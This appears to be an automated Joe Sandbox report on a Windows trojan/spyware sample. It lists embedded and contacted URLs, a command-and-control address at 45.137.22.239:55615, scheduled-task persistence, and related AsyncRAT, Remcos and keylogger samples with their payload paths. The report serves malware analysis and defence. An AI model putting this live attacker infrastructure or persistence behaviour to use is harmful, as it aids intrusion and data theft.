                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
                    http://tempuri.org/00%URL Reputationsafe
                    http://www.fonts.com0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    https://ipinfo.io/ip%appdata%0%URL Reputationsafe
                    http://www.fontbureau.com0%URL Reputationsafe
                    http://45.137.22.239:55615/0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
                    45.137.22.239:556150%Avira URL Cloudsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    http://45.137.22.239:556150%Avira URL Cloudsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://tempuri.org/1%VirustotalBrowse
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
                    http://www.fontbureau.com/designers80%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    https://api.ip.sb0%Avira URL Cloudsafe
                    http://45.137.22.239:55615/11%VirustotalBrowse
                    45.137.22.239:5561511%VirustotalBrowse
                    http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
                    http://tempuri.org/Endpoint/SetEnviron0%Avira URL Cloudsafe
                    http://45.137.22.239:55615t-0%Avira URL Cloudsafe
                    http://45.137.22.239:5561511%VirustotalBrowse
                    http://45.137.22.239:50%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                    http://tempuri.org/Endpoint/SetEnviron1%VirustotalBrowse
                    https://api.ip.sb0%VirustotalBrowse
                    http://45.137.22.239:511%VirustotalBrowse
                    https://api.ip.sb/geoip0%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://45.137.22.239:55615/true
                    • 11%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    45.137.22.239:55615true
                    • 11%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabtmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designersGPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/?PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/bThePzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXPzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/EnvironmentSettingsPzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.ip.sb/geoipPzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D50000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/envelope/VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.tiro.comPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002E80000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designersPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.goodfont.co.krPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/VerifyUpdateResponsePzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/SetEnvironmentVzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002FA8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/SetEnvironmentResponsePzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sajatypeworks.comPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/GetUpdatesVzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D79000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002E80000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/cThePzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/staff/dennis.htmPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.ipify.orgcookies//settinString.RemovegPzPxqbK89H.exe, 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: safe
                    		unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/DPleasePzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/VerifyUpdatePzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/0PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fonts.comPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sandoll.co.krPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.urwpp.deDPleasePzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.zhongyicts.com.cnPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePzPxqbK89H.exe, 00000000.00000002.1735276217.000000000344C000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000A.00000002.1837857971.00000000024DC000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.sakkal.comPzPxqbK89H.exe, 00000000.00000002.1739279048.0000000005D20000.00000004.00000020.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://45.137.22.239:55615PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmptrue
                    • 11%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ipinfo.io/ip%appdata%PzPxqbK89H.exe, 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.comPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousPzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/CheckConnectResponsePzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.datacontract.org/2004/07/PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%PzPxqbK89H.exe, 00000000.00000002.1735860178.0000000004429000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000000.00000002.1735860178.00000000044FD000.00000004.00000800.00020000.00000000.sdmp, PzPxqbK89H.exe, 00000008.00000002.1852775937.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000A.00000002.1839480666.000000000358E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.ip.sbPzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D50000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/CheckConnectPzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.ecosia.org/newtab/tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/0PzPxqbK89H.exe, VzwumYUBCtHW.exe.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/SetEnvironVzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002FA8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://45.137.22.239:55615t-VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D91000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.carterandcone.comlPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/cabarga.htmlNPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cnPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/frere-user.htmlPzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://45.137.22.239:5PzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002BC7000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002FA8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 11%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressingPzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/GetUpdatesResponsePzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.jiyu-kobo.co.jp/PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponsePzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers8PzPxqbK89H.exe, 00000000.00000002.1741145912.0000000007552000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpD5CE.tmp.8.dr, tmp8899.tmp.14.dr, tmpD5F1.tmp.8.dr, tmp9D77.tmp.8.dr, tmp8898.tmp.14.dr, tmpD5E0.tmp.8.dr, tmp8866.tmp.14.dr, tmp8854.tmp.14.dr, tmpC132.tmp.14.dr, tmp9D56.tmp.8.dr, tmp8887.tmp.14.dr, tmpD602.tmp.8.dr, tmp9D45.tmp.8.dr, tmp8876.tmp.14.dr, tmp9D67.tmp.8.dr, tmpC111.tmp.14.dr, tmpD5CF.tmp.8.dr, tmp9D24.tmp.8.dr, tmp9D35.tmp.8.dr, tmpD5F0.tmp.8.dr, tmpC100.tmp.14.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/actor/nextPzPxqbK89H.exe, 00000008.00000002.1857545364.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, VzwumYUBCtHW.exe, 0000000E.00000002.1946573671.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    45.137.22.239
                    		unknownNetherlands
                    		51447ROOTLAYERNETNLtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1502194
                    Start date and time:2024-08-31 14:41:05 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 56s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:PzPxqbK89H.exe
                    renamed because original name is a hash value
                    Original Sample Name:a3dd5c4c73ed04342cb2319ff7cfc714.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@21/103@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 171
                    • Number of non-executed functions: 18
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.12.31, 104.26.13.31
                    • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    08:41:53API Interceptor38x Sleep call for process: PzPxqbK89H.exe modified
                    08:41:59API Interceptor49x Sleep call for process: powershell.exe modified
                    08:42:03API Interceptor39x Sleep call for process: VzwumYUBCtHW.exe modified
                    13:42:00Task SchedulerRun new task: VzwumYUBCtHW path: C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    45.137.22.239SOA 620341.exeGet hashmaliciousAsyncRAT, Neshta, RemcosBrowse
                    • 45.137.22.239/211.jpg
                    8105740.exeGet hashmaliciousAsyncRAT, RemcosBrowse
                    • 45.137.22.239/890.png
                    REMITTANCE.exeGet hashmaliciousAsyncRAT, Snake KeyloggerBrowse
                    • 45.137.22.239/4.bmp
                    PRE ALERT 160-4833933645027883.exeGet hashmaliciousAsyncRAT, RemcosBrowse
                    • 45.137.22.239/7.png
                    Quote 51079366.exeGet hashmaliciousAsyncRAT, Snake KeyloggerBrowse
                    • 45.137.22.239/66.jpg
